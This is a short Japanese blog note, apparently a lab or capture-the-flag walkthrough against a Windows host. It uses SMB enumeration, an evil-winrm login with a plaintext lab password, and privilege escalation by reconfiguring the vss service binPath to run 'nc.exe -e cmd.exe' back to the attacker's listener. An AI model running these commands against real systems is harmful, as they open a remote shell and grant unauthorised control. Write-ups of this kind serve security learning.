enum4linux smbの列挙
5985/tcp winRM(HTTP)
nc -lvnp 389
evil-winrm Evil-WinRMは、WinRMサービスが有効で、資格情報とアクセス許可があるばあいに使えるリモートシェルプログラム。↓
![画像に alt 属性が指定されていません。ファイル名: dtyodfgulhi.png](https://hearts1275.com/wp-content/uploads/2023/06/dtyodfgulhi.png)
evil-winrm -i 10.10.11.108 -u svc-printer -p ‘1edFg43012!!’ls
![](https://hearts1275.com/wp-content/uploads/2023/06/areaerhaerha.png)
services サービスの列挙
net user svc-printer 権限を確認
nc.exeを設置
upload <ローカルパス><リモートパス>
download<リモートパス><ローカルパス>
【serv】upload /usr/share/windows-resources/binaries/nc.exe
【serv】sc.exe config vss binPATH=”C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.2 1234″
【local】nc -vlnp 1234
【serv】sc.exe start vss
download<リモートパス><ローカルパス>
rpcclient sambaのMS-RPC機能をテストするユーティリティ
コメント